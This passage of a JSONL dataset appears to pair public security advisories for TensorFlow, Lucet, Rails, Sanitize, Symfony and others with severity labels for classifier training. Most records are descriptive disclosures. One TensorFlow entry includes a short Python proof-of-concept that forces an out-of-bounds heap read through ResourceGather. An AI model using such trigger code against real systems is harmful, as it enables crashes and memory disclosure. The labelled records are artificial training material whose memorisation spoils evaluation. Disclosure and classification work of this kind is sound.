Attempts", "text_raw": " No Restriction of Excessive Authentication Attempts in Firefly III\n\n[Severity: MEDIUM]\n\nfirefly-iii is vulnerable to Improper Lack of Restriction of Excessive Authentication Attempts", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-09", "split": "train"} -{"id": "2e38637c461a3c2e8fa3", "text": "Unitialized access in `EinsumHelper::ParseEquation`\n\n### Impact\nDuring execution, [`EinsumHelper::ParseEquation()`](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/kernels/linalg/einsum_op_impl.h#L126-L181) is supposed to set the flags in `input_has_ellipsis` vector and `*output_has_ellipsis` boolean to indicate whether there is ellipsis in the corresponding inputs and output.\n\nHowever, the code only changes these flags to `true` and never assigns `false`.\n\n```cc\nfor (int i = 0; i < num_inputs; ++i) {\n input_label_counts->at(i).resize(num_labels);\n for (const int label : input_labels->at(i)) {\n if (label != kEllipsisLabel)\n input_label_counts->at(i)[label] += 1;\n else\n input_has_ellipsis->at(i) = true;\n }\n}\noutput_label_counts->resize(num_labels);\nfor (const int label : *output_labels) {\n if (label != kEllipsisLabel)\n output_label_counts->at(label) += 1;\n else\n *output_has_ellipsis = true;\n}\n```\n\nThis results in unitialized variable access if callers assume that `EinsumHelper::ParseEquation()` always sets these flags.\n\n### Patches\nWe have patched the issue in GitHub commit [f09caa532b6e1ac8d2aa61b7832c78c5b79300c6](https://github.com/tensorflow/tensorflow/commit/f09caa532b6e1ac8d2aa61b7832c78c5b79300c6).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.", "text_raw": "Unitialized access in `EinsumHelper::ParseEquation`\n\n[Severity: HIGH]\n\n### Impact\nDuring execution, [`EinsumHelper::ParseEquation()`](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/kernels/linalg/einsum_op_impl.h#L126-L181) is supposed to set the flags in `input_has_ellipsis` vector and `*output_has_ellipsis` boolean to indicate whether there is ellipsis in the corresponding inputs and output.\n\nHowever, the code only changes these flags to `true` and never assigns `false`.\n\n```cc\nfor (int i = 0; i < num_inputs; ++i) {\n input_label_counts->at(i).resize(num_labels);\n for (const int label : input_labels->at(i)) {\n if (label != kEllipsisLabel)\n input_label_counts->at(i)[label] += 1;\n else\n input_has_ellipsis->at(i) = true;\n }\n}\noutput_label_counts->resize(num_labels);\nfor (const int label : *output_labels) {\n if (label != kEllipsisLabel)\n output_label_counts->at(label) += 1;\n else\n *output_has_ellipsis = true;\n}\n```\n\nThis results in unitialized variable access if callers assume that `EinsumHelper::ParseEquation()` always sets these flags.\n\n\n### Patches\nWe have patched the issue in GitHub commit [f09caa532b6e1ac8d2aa61b7832c78c5b79300c6](https://github.com/tensorflow/tensorflow/commit/f09caa532b6e1ac8d2aa61b7832c78c5b79300c6).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-11-10", "split": "train"} -{"id": "18aca1e5a9a4dc9f7e93", "text": "Use After Free in lucet\n\n### Impact\nThere is a bug in the main branch of Lucet's `lucet-runtime` that allows a use-after-free in an `Instance` object that could result in memory corruption, data race, or other related issues. This bug was introduced early in the development of Lucet and is present in all releases. As a result of this bug, and dependent on the memory backing for the `Instance` objects, it is possible to trigger a use-after-free when the `Instance` is dropped.\n\n### Patches\nUsers should upgrade to the `main` branch of the Lucet repository. Lucet does not provide versioned releases on crates.io.\n\n### Workarounds\nThere is no way to remediate this vulnerability without upgrading.\n\n### Description\nLucet uses a \"pool\" allocator for new WebAssembly instances that are created. This pool allocator manages everything from the linear memory of the wasm instance, the runtime stack for async switching, as well as the memory behind the Instance itself. `Instances` are referred to via an `InstanceHandle` type which will, on drop, release the memory backing the Instance back to the pool.\n\nWhen an Instance is dropped, the fields of the `Instance` are destructed top-to-bottom, however when the `alloc: Alloc` field is destructed, the memory backing the `Instance` is released back to the pool before the destructors of the remaining fields are run. If another thread allocates the same memory from the pool while these destructors are still running, a race condition occurs that can lead to use-after-free errors.\n\nThe bug was corrected by changing how the `InstanceHandle` destructor operates to ensure that the memory backing an Instance is only returned to the pool once the `Instance` has been completely destroyed.\n\nThis security advisory has been assigned CVE-2021-43790.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [lucet repository](https://github.com/bytecodealliance/lucet)\n* Email [the lucet team](mailto:lucet@fastly.com)\n* See the [Bytecode Alliance security policy](https://bytecodealliance.org/security)", "text_raw": "Use After Free in lucet\n\n[Severity: HIGH]\n\n### Impact\nThere is a bug in the main branch of Lucet's `lucet-runtime` that allows a use-after-free in an `Instance` object that could result in memory corruption, data race, or other related issues. This bug was introduced early in the development of Lucet and is present in all releases. As a result of this bug, and dependent on the memory backing for the `Instance` objects, it is possible to trigger a use-after-free when the `Instance` is dropped.\n\n### Patches\nUsers should upgrade to the `main` branch of the Lucet repository. Lucet does not provide versioned releases on crates.io.\n\n### Workarounds\nThere is no way to remediate this vulnerability without upgrading.\n\n### Description\nLucet uses a \"pool\" allocator for new WebAssembly instances that are created. This pool allocator manages everything from the linear memory of the wasm instance, the runtime stack for async switching, as well as the memory behind the Instance itself. `Instances` are referred to via an `InstanceHandle` type which will, on drop, release the memory backing the Instance back to the pool.\n\nWhen an Instance is dropped, the fields of the `Instance` are destructed top-to-bottom, however when the `alloc: Alloc` field is destructed, the memory backing the `Instance` is released back to the pool before the destructors of the remaining fields are run. If another thread allocates the same memory from the pool while these destructors are still running, a race condition occurs that can lead to use-after-free errors.\n\nThe bug was corrected by changing how the `InstanceHandle` destructor operates to ensure that the memory backing an Instance is only returned to the pool once the `Instance` has been completely destroyed.\n\nThis security advisory has been assigned CVE-2021-43790.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [lucet repository](https://github.com/bytecodealliance/lucet)\n* Email [the lucet team](mailto:lucet@fastly.com)\n* See the [Bytecode Alliance security policy](https://bytecodealliance.org/security)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-11-30", "split": "train"} -{"id": "19da8398ee5bd54f0dec", "text": "activesupport Cross-site Scripting vulnerability\n\nCross-site scripting (XSS) vulnerability in `activesupport/lib/active_support/core_ext/string/output_safety.r`b in Ruby on Rails 2.x before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary web script or HTML via a malformed Unicode string, related to a \"UTF-8 escaping vulnerability.\"", "text_raw": "activesupport Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in `activesupport/lib/active_support/core_ext/string/output_safety.r`b in Ruby on Rails 2.x before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary web script or HTML via a malformed Unicode string, related to a \"UTF-8 escaping vulnerability.\"", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "c47ff477b43f01f92eb4", "text": "Heap OOB and CHECK fail in `ResourceGather`\n\n### Impact\nAn attacker can trigger a crash via a `CHECK`-fail in debug builds of TensorFlow using `tf.raw_ops.ResourceGather` or a read from outside the bounds of heap allocated data in the same API in a release build:\n\n```python\nimport tensorflow as tf\n\ntensor = tf.constant(value=[[1,2],[3,4],[5,6]],shape=(3,2),dtype=tf.uint32)\nv = tf.Variable(tensor)\ntf.raw_ops.ResourceGather(\n resource=v.handle,\n indices=[0],\n dtype=tf.uint32,\n batch_dims=10,\n validate_indices=False)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L660-L668) does not check that the `batch_dims` value that the user supplies is less than the rank of the input tensor.\n\nSince the implementation uses several for loops over the dimensions of `tensor`, this results in reading data from outside the bounds of heap allocated buffer backing the tensor:\n\n```cc\n // batch_dims_ = > params.dims() (10 > 2)\n for (int i = 0; i < batch_dims_; ++i) {\n result_shape.AddDim(params.dim_size(i));\n }\n for (int i = batch_dims_; i < indices.dims(); ++i) {\n result_shape.AddDim(indices.dim_size(i));\n }\n for (int i = batch_dims_ + 1; i < params.dims(); ++i) {\n result_shape.AddDim(params.dim_size(i));\n }\n```\n\nIn debug mode, `.dim_size(i)` validates that the argument is less than `.dims()` using a `DCHECK`. But the `DCHECK` is a no-op in release builds.\n\n### Patches\nWe have patched the issue in GitHub commit [bc9c546ce7015c57c2f15c168b3d9201de679a1d](https://github.com/tensorflow/tensorflow/commit/bc9c546ce7015c57c2f15c168b3d9201de679a1d).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Heap OOB and CHECK fail in `ResourceGather`\n\n[Severity: HIGH]\n\n### Impact\nAn attacker can trigger a crash via a `CHECK`-fail in debug builds of TensorFlow using `tf.raw_ops.ResourceGather` or a read from outside the bounds of heap allocated data in the same API in a release build:\n\n```python\nimport tensorflow as tf\n\ntensor = tf.constant(value=[[1,2],[3,4],[5,6]],shape=(3,2),dtype=tf.uint32)\nv = tf.Variable(tensor)\ntf.raw_ops.ResourceGather(\n resource=v.handle,\n indices=[0],\n dtype=tf.uint32,\n batch_dims=10,\n validate_indices=False)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L660-L668) does not check that the `batch_dims` value that the user supplies is less than the rank of the input tensor.\n\nSince the implementation uses several for loops over the dimensions of `tensor`, this results in reading data from outside the bounds of heap allocated buffer backing the tensor:\n\n```cc\n // batch_dims_ = > params.dims() (10 > 2)\n for (int i = 0; i < batch_dims_; ++i) {\n result_shape.AddDim(params.dim_size(i));\n }\n for (int i = batch_dims_; i < indices.dims(); ++i) {\n result_shape.AddDim(indices.dim_size(i));\n }\n for (int i = batch_dims_ + 1; i < params.dims(); ++i) {\n result_shape.AddDim(params.dim_size(i));\n }\n```\n\nIn debug mode, `.dim_size(i)` validates that the argument is less than `.dims()` using a `DCHECK`. But the `DCHECK` is a no-op in release builds.\n\n### Patches\nWe have patched the issue in GitHub commit [bc9c546ce7015c57c2f15c168b3d9201de679a1d](https://github.com/tensorflow/tensorflow/commit/bc9c546ce7015c57c2f15c168b3d9201de679a1d).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "8fad81dd31ae36bcbe80", "text": "Heap OOB in TFLite\n\n### Impact\nTFLite's [`expand_dims.cc`](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/expand_dims.cc#L36-L50) contains a vulnerability which allows reading one element outside of bounds of heap allocated data:\n\n```cc\n if (axis < 0) { \n axis = input_dims.size + 1 + axis;\n } \n TF_LITE_ENSURE(context, axis <= input_dims.size);\n\nTfLiteIntArray* output_dims = TfLiteIntArrayCreate(input_dims.size + 1);\n for (int i = 0; i < output_dims->size; ++i) {\n if (i < axis) {\n output_dims->data[i] = input_dims.data[i];\n } else if (i == axis) {\n output_dims->data[i] = 1;\n } else {\n output_dims->data[i] = input_dims.data[i - 1];\n }\n }\n```\n\nIf `axis` is a large negative value (e.g., `-100000`), then after the first `if` it would still be negative. The check following the `if` statement will pass and the `for` loop would read one element before the start of `input_dims.data` (when `i = 0`).\n\n### Patches\nWe have patched the issue in GitHub commit [d94ffe08a65400f898241c0374e9edc6fa8ed257](https://github.com/tensorflow/tensorflow/commit/d94ffe08a65400f898241c0374e9edc6fa8ed257).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang of Baidu Security.", "text_raw": "Heap OOB in TFLite\n\n[Severity: MEDIUM]\n\n### Impact\nTFLite's [`expand_dims.cc`](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/expand_dims.cc#L36-L50) contains a vulnerability which allows reading one element outside of bounds of heap allocated data:\n\n```cc\n if (axis < 0) { \n axis = input_dims.size + 1 + axis;\n } \n TF_LITE_ENSURE(context, axis <= input_dims.size);\n\n TfLiteIntArray* output_dims = TfLiteIntArrayCreate(input_dims.size + 1);\n for (int i = 0; i < output_dims->size; ++i) {\n if (i < axis) {\n output_dims->data[i] = input_dims.data[i];\n } else if (i == axis) {\n output_dims->data[i] = 1;\n } else {\n output_dims->data[i] = input_dims.data[i - 1];\n }\n }\n```\n\nIf `axis` is a large negative value (e.g., `-100000`), then after the first `if` it would still be negative. The check following the `if` statement will pass and the `for` loop would read one element before the start of `input_dims.data` (when `i = 0`).\n\n### Patches\nWe have patched the issue in GitHub commit [d94ffe08a65400f898241c0374e9edc6fa8ed257](https://github.com/tensorflow/tensorflow/commit/d94ffe08a65400f898241c0374e9edc6fa8ed257).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang of Baidu Security.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "aadd4d17e23d3d7fc462", "text": "Downloads Resources over HTTP in nw\n\nAffected versions of `nw` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `nw`.\n\n## Recommendation\n\nUpdate to version 0.23.6-1 or later.", "text_raw": "Downloads Resources over HTTP in nw\n\n[Severity: HIGH]\n\nAffected versions of `nw` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `nw`.\n\n\n## Recommendation\n\nUpdate to version 0.23.6-1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "d3d4ac78bb104fe2f0a7", "text": "Jetty vulnerable to cache poisoning due to inconsistent HTTP request handling (HTTP Request Smuggling)\n\nEclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), contain an HTTP Request Smuggling Vulnerability that can result in cache poisoning.", "text_raw": "Jetty vulnerable to cache poisoning due to inconsistent HTTP request handling (HTTP Request Smuggling)\n\n[Severity: HIGH]\n\nEclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), contain an HTTP Request Smuggling Vulnerability that can result in cache poisoning.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-19", "split": "train"} -{"id": "854e457d639eec1389fb", "text": "Improper input validation in Apache Santuario XML Security for Java\n\nIn version 2.0.3 Apache Santuario XML Security for Java, a caching mechanism was introduced to speed up creating new XML documents using a static pool of DocumentBuilders. However, if some untrusted code can register a malicious implementation with the thread context class loader first, then this implementation might be cached and re-used by Apache Santuario - XML Security for Java, leading to potential security flaws when validating signed documents, etc. The vulnerability affects Apache Santuario - XML Security for Java 2.0.x releases from 2.0.3 and all 2.1.x releases before 2.1.4.", "text_raw": "Improper input validation in Apache Santuario XML Security for Java\n\n[Severity: MEDIUM]\n\nIn version 2.0.3 Apache Santuario XML Security for Java, a caching mechanism was introduced to speed up creating new XML documents using a static pool of DocumentBuilders. However, if some untrusted code can register a malicious implementation with the thread context class loader first, then this implementation might be cached and re-used by Apache Santuario - XML Security for Java, leading to potential security flaws when validating signed documents, etc. The vulnerability affects Apache Santuario - XML Security for Java 2.0.x releases from 2.0.3 and all 2.1.x releases before 2.1.4.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-08-27", "split": "train"} -{"id": "aa0cc419835f76086204", "text": "actionpack allows remote code execution via application's unrestricted use of render method\n\nAction Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "text_raw": "actionpack allows remote code execution via application's unrestricted use of render method\n\n[Severity: HIGH]\n\nAction Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "6ae1230c6c188e6f4114", "text": "Zen Cart v1.3.9f Multiple Remote Vulnerabilities", "text_raw": "Zen Cart v1.3.9f Multiple Remote Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2010-10-01", "split": "train"} -{"id": "13f5dd167c0afdeed2a1", "text": "Cross-site Scripting in Sanitize\n\nWhen HTML is sanitized using Sanitize's \"relaxed\" config or a custom config that allows certain elements, some content in a `` or `` element may not be sanitized correctly even if `math` and `svg` are not in the allowlist.\n\nYou are likely to be vulnerable to this issue if you use Sanitize's relaxed config or a custom config that allows one or more of the following HTML elements:\n\n- `iframe`\n- `math`\n- `noembed`\n- `noframes`\n- `noscript`\n- `plaintext`\n- `script`\n- `style`\n- `svg`\n- `xmp`\n\n### Impact\n\nUsing carefully crafted input, an attacker may be able to sneak arbitrary HTML through Sanitize, potentially resulting in XSS (cross-site scripting) or other undesired behavior when that HTML is rendered in a browser.\n\n### Releases\n\nThis problem has been fixed in Sanitize 5.2.1.\n\n### Workarounds\n\nIf upgrading is not possible, a workaround is to override the default value of Sanitize's `:remove_contents` config option with the following value, which ensures that the contents of `math` and `svg` elements (among others) are removed entirely when those elements are not in the allowlist:\n\n```ruby\n%w[iframe math noembed noframes noscript plaintext script style svg xmp]\n```\n\nFor example, if you currently use Sanitize's relaxed config, you can create a custom config object that overrides the default value of `:remove_contents` like this:\n\n```ruby\ncustom_config = Sanitize::Config.merge(\n Sanitize::Config::RELAXED,\n :remove_contents => %w[iframe math noembed noframes noscript plaintext script style svg xmp]\n)\n```\n\nYou would then pass this custom config to Sanitize when sanitizing HTML.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n- Open an issue in the [Sanitize repo](https://github.com/rgrove/sanitize).\n- See Sanitize's [security policy](https://github.com/rgrove/sanitize/security/policy).\n\n### Credits\n\nMany thanks to Michal Bentkowski of Securitum for reporting this bug and helping to verify the fix.\n\n### References\n\n- [GHSA-p4x4-rw2p-8j8m](https://github.com/rgrove/sanitize/security/advisories/GHSA-p4x4-rw2p-8j8m)\n- [CVE-2020-4054](https://nvd.nist.gov/vuln/detail/CVE-2020-4054)\n- https://github.com/rgrove/sanitize/releases/tag/v5.2.1", "text_raw": "Cross-site Scripting in Sanitize \n\n[Severity: HIGH]\n\nWhen HTML is sanitized using Sanitize's \"relaxed\" config or a custom config that allows certain elements, some content in a `` or `` element may not be sanitized correctly even if `math` and `svg` are not in the allowlist.\n\nYou are likely to be vulnerable to this issue if you use Sanitize's relaxed config or a custom config that allows one or more of the following HTML elements:\n\n- `iframe`\n- `math`\n- `noembed`\n- `noframes`\n- `noscript`\n- `plaintext`\n- `script`\n- `style`\n- `svg`\n- `xmp`\n\n### Impact\n\nUsing carefully crafted input, an attacker may be able to sneak arbitrary HTML through Sanitize, potentially resulting in XSS (cross-site scripting) or other undesired behavior when that HTML is rendered in a browser.\n\n### Releases\n\nThis problem has been fixed in Sanitize 5.2.1.\n\n### Workarounds\n\nIf upgrading is not possible, a workaround is to override the default value of Sanitize's `:remove_contents` config option with the following value, which ensures that the contents of `math` and `svg` elements (among others) are removed entirely when those elements are not in the allowlist:\n\n```ruby\n%w[iframe math noembed noframes noscript plaintext script style svg xmp]\n```\n\nFor example, if you currently use Sanitize's relaxed config, you can create a custom config object that overrides the default value of `:remove_contents` like this:\n\n```ruby\ncustom_config = Sanitize::Config.merge(\n Sanitize::Config::RELAXED,\n :remove_contents => %w[iframe math noembed noframes noscript plaintext script style svg xmp]\n)\n```\n\nYou would then pass this custom config to Sanitize when sanitizing HTML.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n- Open an issue in the [Sanitize repo](https://github.com/rgrove/sanitize).\n- See Sanitize's [security policy](https://github.com/rgrove/sanitize/security/policy).\n\n### Credits\n\nMany thanks to Michal Bentkowski of Securitum for reporting this bug and helping to verify the fix.\n\n### References\n\n- [GHSA-p4x4-rw2p-8j8m](https://github.com/rgrove/sanitize/security/advisories/GHSA-p4x4-rw2p-8j8m)\n- [CVE-2020-4054](https://nvd.nist.gov/vuln/detail/CVE-2020-4054)\n- https://github.com/rgrove/sanitize/releases/tag/v5.2.1", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-06-16", "split": "train"} -{"id": "0f61fd953051e708e5bc", "text": "Path Traversal in serve-here.js\n\nVersions of `serve-here.js` prior to 1.2.0 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.\n\n## Recommendation\n\nUpgrade to version 1.2.0 or later.", "text_raw": "Path Traversal in serve-here.js\n\n[Severity: HIGH]\n\nVersions of `serve-here.js` prior to 1.2.0 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.\n\n\n## Recommendation\n\nUpgrade to version 1.2.0 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-07-05", "split": "train"} -{"id": "78f8403f5ed8a6b50e95", "text": "Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability", "text_raw": "Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2010-08-14", "split": "train"} -{"id": "e68cbb929fe30b6427ef", "text": "CSV Injection in symfony/serializer\n\nDescription\n-----------\n\nCSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program opens a CSV, any cell starting with `=` is interpreted by the software as a formula and could be abused by an attacker.\n\nIn Symfony 4.1, we've added the opt-in `csv_escape_formulas` option in `CsvEncoder`, to prefix all cells starting by `=`, `+`, `-` or `@` by a tab `\\t`.\n\nSince then, OWASP added 2 chars in that list: \n- Tab (0x09)\n- Carriage return (0x0D)\n\nThis makes our previous prefix char (Tab `\\t`) part of the vulnerable characters, and [OWASP suggests](https://owasp.org/www-community/attacks/CSV_Injection) using the single quote `'` for prefixing the value.\n\nResolution\n----------\n\nSymfony now follows the OWASP recommendations and use the single quote `'` to prefix formulas and adds the prefix to cells starting by `\\t`, `\\r` as well as `=`, `+`, `-` and `@`.\n\nThe patch for this issue is available [here](https://github.com/symfony/symfony/commit/3da6f2d45e7536ccb2a26f52fbaf340917e208a8) for branch 4.4.\n\nCredits\n-------\n\nWe would like to thank Jake Barwell for reporting the issue and Jérémy Derussé for fixing the issue.", "text_raw": "CSV Injection in symfony/serializer\n\n[Severity: MEDIUM]\n\nDescription\n-----------\n\nCSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program opens a CSV, any cell starting with `=` is interpreted by the software as a formula and could be abused by an attacker.\n\nIn Symfony 4.1, we've added the opt-in `csv_escape_formulas` option in `CsvEncoder`, to prefix all cells starting by `=`, `+`, `-` or `@` by a tab `\\t`. \n\nSince then, OWASP added 2 chars in that list: \n- Tab (0x09)\n- Carriage return (0x0D)\n\nThis makes our previous prefix char (Tab `\\t`) part of the vulnerable characters, and [OWASP suggests](https://owasp.org/www-community/attacks/CSV_Injection) using the single quote `'` for prefixing the value.\n\nResolution\n----------\n\nSymfony now follows the OWASP recommendations and use the single quote `'` to prefix formulas and adds the prefix to cells starting by `\\t`, `\\r` as well as `=`, `+`, `-` and `@`.\n\nThe patch for this issue is available [here](https://github.com/symfony/symfony/commit/3da6f2d45e7536ccb2a26f52fbaf340917e208a8) for branch 4.4.\n\nCredits\n-------\n\nWe would like to thank Jake Barwell for reporting the issue and Jérémy Derussé for fixing the issue.\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-24", "split": "train"} -{"id": "df61c04aa629e47ec3bf", "text": "pwntools Server-Side Template Injection (SSTI) vulnerability\n\nThis affects the package pwntools before 4.3.1. The shellcraft generator for affected versions of this module are vulnerable to Server-Side Template Injection (SSTI), which can lead to remote code execution.", "text_raw": "pwntools Server-Side Template Injection (SSTI) vulnerability\n\n[Severity: CRITICAL]\n\nThis affects the package pwntools before 4.3.1. The shellcraft generator for affected versions of this module are vulnerable to Server-Side Template Injection (SSTI), which can lead to remote code execution.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-04-20", "split": "train"} -{"id": "8fd08c19117d18bd9d34", "text": "Deserialization of Untrusted Data in topthink/framework\n\nThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component League\\Flysystem\\Cached\\Storage\\AbstractCache.", "text_raw": "Deserialization of Untrusted Data in topthink/framework\n\n[Severity: CRITICAL]\n\nThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component League\\Flysystem\\Cached\\Storage\\AbstractCache.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-12-07", "split": "train"} -{"id": "ceab465dfb9757e34cd8", "text": "Netautor Professional 5.5.0 (goback) XSS Vulnerability", "text_raw": "Netautor Professional 5.5.0 (goback) XSS Vulnerability\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2010-09-17", "split": "train"} -{"id": "6a7e91e5ff2e1166c4d9", "text": "Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit", "text_raw": "Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2010-08-26", "split": "train"} -{"id": "c21a9fade39ae3437317", "text": "Cross-Site Scripting\n\nFlower, before 0.9.2, has a XSS on tasks page because data is not properly escaped.", "text_raw": "Cross-Site Scripting\n\n[Severity: MEDIUM]\n\nFlower, before 0.9.2, has a XSS on tasks page because data is not properly escaped.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-02-24", "split": "train"} -{"id": "fee14c2ebf9a4bb7d1f3", "text": "Downloads Resources over HTTP in limbus-buildgen\n\nAffected versions of `limbus-buildgen` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `limbus-buildgen`.\n\n## Recommendation\n\nUpdate to version 0.1.1 or later.", "text_raw": "Downloads Resources over HTTP in limbus-buildgen\n\n[Severity: HIGH]\n\nAffected versions of `limbus-buildgen` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `limbus-buildgen`.\n\n\n## Recommendation\n\nUpdate to version 0.1.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "69e9644651ea6af8645f", "text": "Double free in basic_dsp_matrix\n\nAn issue was discovered in the basic_dsp_matrix crate before 0.9.2 for Rust. When a TransformContent panic occurs, a double drop can be performed.", "text_raw": "Double free in basic_dsp_matrix\n\n[Severity: HIGH]\n\nAn issue was discovered in the basic_dsp_matrix crate before 0.9.2 for Rust. When a TransformContent panic occurs, a double drop can be performed.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "0545adaba7088fd80b9c", "text": "Cross-Site Scripting in buefy\n\nVersions of buefy prior to 0.7.2 are vulnerable to Cross-Site Scripting, allowing attackers to manipulate the DOM and execute remote code. The autocomplete list renders user input as HTML without encoding.\n\n## Recommendation\n\nUpgrade to version 0.7.2 or later.", "text_raw": "Cross-Site Scripting in buefy\n\n[Severity: HIGH]\n\nVersions of buefy prior to 0.7.2 are vulnerable to Cross-Site Scripting, allowing attackers to manipulate the DOM and execute remote code. The 